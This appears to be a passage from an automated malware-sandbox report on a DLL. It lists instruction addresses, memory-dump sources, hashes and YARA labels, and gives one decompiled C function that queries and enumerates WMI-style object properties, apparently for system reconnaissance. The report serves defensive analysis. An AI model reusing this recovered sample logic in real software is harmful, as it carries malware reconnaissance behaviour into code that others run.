                                                                                                                                                                                                0x100171e5
                                                                                                                                                                                                0x100171ec
                                                                                                                                                                                                0x100171f2
                                                                                                                                                                                                0x100171f5
                                                                                                                                                                                                0x100171f8
                                                                                                                                                                                                0x100171fb
                                                                                                                                                                                                0x100171fe
                                                                                                                                                                                                0x10017201
                                                                                                                                                                                                0x10017207
                                                                                                                                                                                                0x10017215
                                                                                                                                                                                                0x1001721b
                                                                                                                                                                                                0x1001721e
                                                                                                                                                                                                0x10017221
                                                                                                                                                                                                0x10017221
                                                                                                                                                                                                0x10017224
                                                                                                                                                                                                0x10017226
                                                                                                                                                                                                0x10017229
                                                                                                                                                                                                0x1001722f
                                                                                                                                                                                                0x10017236
                                                                                                                                                                                                0x1001723c
                                                                                                                                                                                                0x10017295
                                                                                                                                                                                                0x10017295
                                                                                                                                                                                                0x10017298
                                                                                                                                                                                                0x10017298
                                                                                                                                                                                                0x1001729e
                                                                                                                                                                                                0x100172a6
                                                                                                                                                                                                0x100172b3
                                                                                                                                                                                                0x1001723e
                                                                                                                                                                                                0x1001723e
                                                                                                                                                                                                0x10017249
                                                                                                                                                                                                0x1001724c
                                                                                                                                                                                                0x1001724f
                                                                                                                                                                                                0x10017252
                                                                                                                                                                                                0x10017259
                                                                                                                                                                                                0x1001725c
                                                                                                                                                                                                0x1001725f
                                                                                                                                                                                                0x10017262
                                                                                                                                                                                                0x10017265
                                                                                                                                                                                                0x1001726b
                                                                                                                                                                                                0x10017277
                                                                                                                                                                                                0x1001727c
                                                                                                                                                                                                0x10017289
                                                                                                                                                                                                0x10017289
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001723c
                                                                                                                                                                                                0x1001701a
                                                                                                                                                                                                0x1001701f
                                                                                                                                                                                                0x10017025
                                                                                                                                                                                                0x10017025
                                                                                                                                                                                                0x1001702d
                                                                                                                                                                                                0x1001702d
                                                                                                                                                                                                0x10017035
                                                                                                                                                                                                0x10017035
                                                                                                                                                                                                0x1001703d
                                                                                                                                                                                                0x1001704a
                                                                                                                                                                                                0x10017053
                                                                                                                                                                                                0x10017058
                                                                                                                                                                                                0x1001709d
                                                                                                                                                                                                0x1001709f
                                                                                                                                                                                                0x1001705a
                                                                                                                                                                                                0x1001705a
                                                                                                                                                                                                0x1001705d
                                                                                                                                                                                                0x10017060
                                                                                                                                                                                                0x10017067
                                                                                                                                                                                                0x1001706a
                                                                                                                                                                                                0x1001706d
                                                                                                                                                                                                0x10017070
                                                                                                                                                                                                0x10017073
                                                                                                                                                                                                0x10017079
                                                                                                                                                                                                0x10017087
                                                                                                                                                                                                0x1001708d
                                                                                                                                                                                                0x10017096
                                                                                                                                                                                                0x10017099
                                                                                                                                                                                                0x10017099
                                                                                                                                                                                                0x100170a2
                                                                                                                                                                                                0x100170a5
                                                                                                                                                                                                0x100170ab
                                                                                                                                                                                                0x100170ab
                                                                                                                                                                                                0x100170b2
                                                                                                                                                                                                0x100170b2
                                                                                                                                                                                                0x100170b9
                                                                                                                                                                                                0x100170b9
                                                                                                                                                                                                0x100170c1
                                                                                                                                                                                                0x100170c1
                                                                                                                                                                                                0x100170c8
                                                                                                                                                                                                0x100170d5
                                                                                                                                                                                                0x100170de
                                                                                                                                                                                                0x100170e1
                                                                                                                                                                                                0x100170e6
                                                                                                                                                                                                0x100170e8
                                                                                                                                                                                                0x100170eb
                                                                                                                                                                                                0x100170f2
                                                                                                                                                                                                0x100170f8
                                                                                                                                                                                                0x100170fb
                                                                                                                                                                                                0x100170fe
                                                                                                                                                                                                0x10017101
                                                                                                                                                                                                0x10017104
                                                                                                                                                                                                0x10017107
                                                                                                                                                                                                0x1001710d
                                                                                                                                                                                                0x1001711b
                                                                                                                                                                                                0x10017121
                                                                                                                                                                                                0x10017124
                                                                                                                                                                                                0x10017127
                                                                                                                                                                                                0x10017127
                                                                                                                                                                                                0x1001712a
                                                                                                                                                                                                0x1001712c
                                                                                                                                                                                                0x1001712f
                                                                                                                                                                                                0x10017135
                                                                                                                                                                                                0x1001713c
                                                                                                                                                                                                0x10017142
                                                                                                                                                                                                0x1001719b
                                                                                                                                                                                                0x1001719b
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10017144
                                                                                                                                                                                                0x10017144
                                                                                                                                                                                                0x1001714f
                                                                                                                                                                                                0x10017152
                                                                                                                                                                                                0x10017155
                                                                                                                                                                                                0x10017158
                                                                                                                                                                                                0x1001715f
                                                                                                                                                                                                0x10017162
                                                                                                                                                                                                0x10017165
                                                                                                                                                                                                0x10017168
                                                                                                                                                                                                0x1001716b
                                                                                                                                                                                                0x10017171
                                                                                                                                                                                                0x1001717d
                                                                                                                                                                                                0x10017182
                                                                                                                                                                                                0x1001718f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001718f
                                                                                                                                                                                                0x10016f64
                                                                                                                                                                                                0x10016f6a
                                                                                                                                                                                                0x10016f6d
                                                                                                                                                                                                0x10016f70
                                                                                                                                                                                                0x10016f70
                                                                                                                                                                                                0x10016f73
                                                                                                                                                                                                0x10016f73
                                                                                                                                                                                                0x10016f79
                                                                                                                                                                                                0x10016f79
                                                                                                                                                                                                0x10016f81
                                                                                                                                                                                                0x10016f86
                                                                                                                                                                                                0x10016f93
                                                                                                                                                                                                0x10016f9c
                                                                                                                                                                                                0x10016f9f
                                                                                                                                                                                                0x10016fa4
                                                                                                                                                                                                0x10016fec
                                                                                                                                                                                                0x10016fa6
                                                                                                                                                                                                0x10016fa6
                                                                                                                                                                                                0x10016fa9
                                                                                                                                                                                                0x10016fb0
                                                                                                                                                                                                0x10016fb6
                                                                                                                                                                                                0x10016fb9
                                                                                                                                                                                                0x10016fbc
                                                                                                                                                                                                0x10016fbf
                                                                                                                                                                                                0x10016fc2
                                                                                                                                                                                                0x10016fc5
                                                                                                                                                                                                0x10016fcb
                                                                                                                                                                                                0x10016fd9
                                                                                                                                                                                                0x10016fdc
                                                                                                                                                                                                0x10016fdf
                                                                                                                                                                                                0x10016fe8
                                                                                                                                                                                                0x10016fe8
                                                                                                                                                                                                0x10016ff2
                                                                                                                                                                                                0x10016ff8
                                                                                                                                                                                                0x10016ffb
                                                                                                                                                                                                0x10017002
                                                                                                                                                                                                0x10017002
                                                                                                                                                                                                0x100173b5
                                                                                                                                                                                                0x100173b5
                                                                                                                                                                                                0x100173b8
                                                                                                                                                                                                0x100173ba
                                                                                                                                                                                                0x100173bf
                                                                                                                                                                                                0x100173ce
                                                                                                                                                                                                0x100173da
                                                                                                                                                                                                0x100173df
                                                                                                                                                                                                0x100173df
                                                                                                                                                                                                0x100173d0
                                                                                                                                                                                                0x100173d0
                                                                                                                                                                                                0x100173d5
                                                                                                                                                                                                0x100173d5
                                                                                                                                                                                                0x100173d5
                                                                                                                                                                                                0x100173c1
                                                                                                                                                                                                0x100173c1
                                                                                                                                                                                                0x100173c6
                                                                                                                                                                                                0x100173c6
                                                                                                                                                                                                0x100173c6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100173bf
                                                                                                                                                                                                0x10016f5e
                                                                                                                                                                                                0x10016f53
                                                                                                                                                                                                0x10016f56
                                                                                                                                                                                                0x100173e4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100173e4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100173e7
                                                                                                                                                                                                0x100173e7
                                                                                                                                                                                                0x100173eb
                                                                                                                                                                                                0x100173eb
                                                                                                                                                                                                0x100173eb
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10016f34

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
                                                                                                                                                                                                • Instruction ID: 5b0f1481b3507e53faa68fea0c4d4dce0c644c93c0065929635aa94c1f82f527
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5BF16D755092118FC709CF28C4D48F97BF1FFA9310B1A82F9D8999B3A6D731A980CB91
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 10015000, Relevance: .2, Instructions: 190COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
                                                                                                                                                                                                • Instruction ID: 90d23c0658679a52155eb39e6254ce444f14c2fdf9d5de364fde577eb9212e47
                                                                                                                                                                                                • Opcode Fuzzy Hash: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B7114756201758FE704CF6ADCD09BA33A1E78E34138AC619FA41CF395C535E626DBA0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 10011790, Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: a6537fa0602603724b16c29000722af37df582b2c80d40423e3c4ba9a4a91a1a
                                                                                                                                                                                                • Instruction ID: 1da37d57835d9cab1afde3d64822888ff80288cca5f41f047eaea9f02bbf5adc
                                                                                                                                                                                                • Opcode Fuzzy Hash: a6537fa0602603724b16c29000722af37df582b2c80d40423e3c4ba9a4a91a1a
                                                                                                                                                                                                • Instruction Fuzzy Hash: A15168B3B041B00BDF5CCE3E8C642757ED25AC515670EC2B6E9A9CF24AE978C7059760
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1006BAE5, Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.389072703.000000001006B000.00000040.00020000.sdmp, Offset: 1006B000, based on PE: false
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                                                                                                • Instruction ID: 94c65a7d2af16b431307d3a72fe19380af7a04fcf923a85705189e20b060aea8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 051181B33405049FD754CE59EC91EA6B3DAEB88270B258066ED04CB315D7B6E841C7A0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1001237E, Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
                                                                                                                                                                                                • Instruction ID: b2beba9252d8a9181e491ef2832f98eb2d68de2fc6035f9ae8d1373986d91cf2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
                                                                                                                                                                                                • Instruction Fuzzy Hash: C02174766154228BD35CDF2CD8A6A69F3A5FB48310F85427ED51BCB682C771E492CBC0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1006BDDA, Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.389072703.000000001006B000.00000040.00020000.sdmp, Offset: 1006B000, based on PE: false
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                                                                                                                                                                                • Instruction ID: f5f7ce78148428327b0f4883b4b281390c9bb80e7c1670e02bd229244927e364
                                                                                                                                                                                                • Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5901F5B23146418FC718CF29D884DEEBBE9EBC1264B25C07ECA4683715E235ED85CA20
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1000DB7E, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                                                			E1000DB7E(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E1000D565(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E100085E5(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E100085FB( &_v60, 0xfffffffe);
					E1000D619( &_v104);
					return _t320;
				}
				_t165 = E100095C2(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E100095C2(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E100092C6(_t165);
				_v60 = _t322;
				E100085B6( &_v52);
				E100085B6( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E100095C2(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E100085B6( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E100085FB( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E100091C4(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E100091C4(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E10008679(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E100085E5( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E100085FB(_t136, 0);
								E100085FB( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E100091C4(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E100095C2(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E100095C2(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E100085E5(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E100085B6( &_v92);
											E100085B6( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E10009621();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E100085E5(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E100095C2(_t283, 0x219);
										E10009621( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E100085B6( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E100091C4(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E1000DA62( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E100085FB( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































                                                                                                                                                                                                0x1000db87
                                                                                                                                                                                                0x1000db8d
                                                                                                                                                                                                0x1000db94
                                                                                                                                                                                                0x1000db97
                                                                                                                                                                                                0x1000db9a
                                                                                                                                                                                                0x1000db9f
                                                                                                                                                                                                0x1000dba1
                                                                                                                                                                                                0x1000dba6
                                                                                                                                                                                                0x1000dfee
                                                                                                                                                                                                0x1000dfee
                                                                                                                                                                                                0x1000dbb3
                                                                                                                                                                                                0x1000dbb5
                                                                                                                                                                                                0x1000dbb8
                                                                                                                                                                                                0x1000dbbb
                                                                                                                                                                                                0x1000dfd3
                                                                                                                                                                                                0x1000dfd9
                                                                                                                                                                                                0x1000dfe3
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000dfe8
                                                                                                                                                                                                0x1000dbc6
                                                                                                                                                                                                0x1000dbcd
                                                                                                                                                                                                0x1000dbd4
                                                                                                                                                                                                0x1000dbd7
                                                                                                                                                                                                0x1000dbdc
                                                                                                                                                                                                0x1000dbde
                                                                                                                                                                                                0x1000dbe1
                                                                                                                                                                                                0x1000dbe4
                                                                                                                                                                                                0x1000dbe5
                                                                                                                                                                                                0x1000dbee
                                                                                                                                                                                                0x1000dbf4
                                                                                                                                                                                                0x1000dbf7
                                                                                                                                                                                                0x1000dc00
                                                                                                                                                                                                0x1000dc05
                                                                                                                                                                                                0x1000dc0a
                                                                                                                                                                                                0x1000dc21
                                                                                                                                                                                                0x1000dc2e
                                                                                                                                                                                                0x1000dc31
                                                                                                                                                                                                0x1000dc38
                                                                                                                                                                                                0x1000dc3d
                                                                                                                                                                                                0x1000dc44
                                                                                                                                                                                                0x1000dc49
                                                                                                                                                                                                0x1000dc50
                                                                                                                                                                                                0x1000dc52
                                                                                                                                                                                                0x1000dc5e
                                                                                                                                                                                                0x1000dc61
                                                                                                                                                                                                0x1000dc63
                                                                                                                                                                                                0x1000dfc3
                                                                                                                                                                                                0x1000dfc4
                                                                                                                                                                                                0x1000dfcd
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000dfcd
                                                                                                                                                                                                0x1000dc69
                                                                                                                                                                                                0x1000dc6c
                                                                                                                                                                                                0x1000dc6f
                                                                                                                                                                                                0x1000dc72
                                                                                                                                                                                                0x1000dc74
                                                                                                                                                                                                0x1000df8f
                                                                                                                                                                                                0x1000df92
                                                                                                                                                                                                0x1000df95
                                                                                                                                                                                                0x1000df97
                                                                                                                                                                                                0x1000dfb9
                                                                                                                                                                                                0x1000dfbe
                                                                                                                                                                                                0x1000df99
                                                                                                                                                                                                0x1000df9c
                                                                                                                                                                                                0x1000dfa7
                                                                                                                                                                                                0x1000dfae
                                                                                                                                                                                                0x1000dfae
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000dc7a
                                                                                                                                                                                                0x1000dc7a
                                                                                                                                                                                                0x1000dc8c
                                                                                                                                                                                                0x1000dc8f
                                                                                                                                                                                                0x1000dc91
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000dc99
                                                                                                                                                                                                0x1000dc9c
                                                                                                                                                                                                0x1000dc9f
                                                                                                                                                                                                0x1000dca2
                                                                                                                                                                                                0x1000dca5
                                                                                                                                                                                                0x1000dca8
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000dcae
                                                                                                                                                                                                0x1000dcbc
                                                                                                                                                                                                0x1000dcbf
                                                                                                                                                                                                0x1000dcc1
                                                                                                                                                                                                0x1000dcda
                                                                                                                                                                                                0x1000dce9
                                                                                                                                                                                                0x1000dcf1
                                                                                                                                                                                                0x1000dcf1
                                                                                                                                                                                                0x1000dcf4
                                                                                                                                                                                                0x1000dcfb
                                                                                                                                                                                                0x1000dcff
                                                                                                                                                                                                0x1000dd05
                                                                                                                                                                                                0x1000dd07
                                                                                                                                                                                                0x1000df77
                                                                                                                                                                                                0x1000df7d
                                                                                                                                                                                                0x1000df83
                                                                                                                                                                                                0x1000df86
                                                                                                                                                                                                0x1000df86
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000df86
                                                                                                                                                                                                0x1000dd16
                                                                                                                                                                                                0x1000dd2a
                                                                                                                                                                                                0x1000dd2e
                                                                                                                                                                                                0x1000dd30
                                                                                                                                                                                                0x1000dd35
                                                                                                                                                                                                0x1000df44
                                                                                                                                                                                                0x1000df4a
                                                                                                                                                                                                0x1000df55
                                                                                                                                                                                                0x1000df60
                                                                                                                                                                                                0x1000df66
                                                                                                                                                                                                0x1000df6c
                                                                                                                                                                                                0x1000df6f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000df6f
                                                                                                                                                                                                0x1000dd3b
                                                                                                                                                                                                0x1000df12
                                                                                                                                                                                                0x1000df12
                                                                                                                                                                                                0x1000df15
                                                                                                                                                                                                0x1000df18
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000dd43
                                                                                                                                                                                                0x1000dd4b
                                                                                                                                                                                                0x1000dd52
                                                                                                                                                                                                0x1000dd58
                                                                                                                                                                                                0x1000dd5a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000dd63
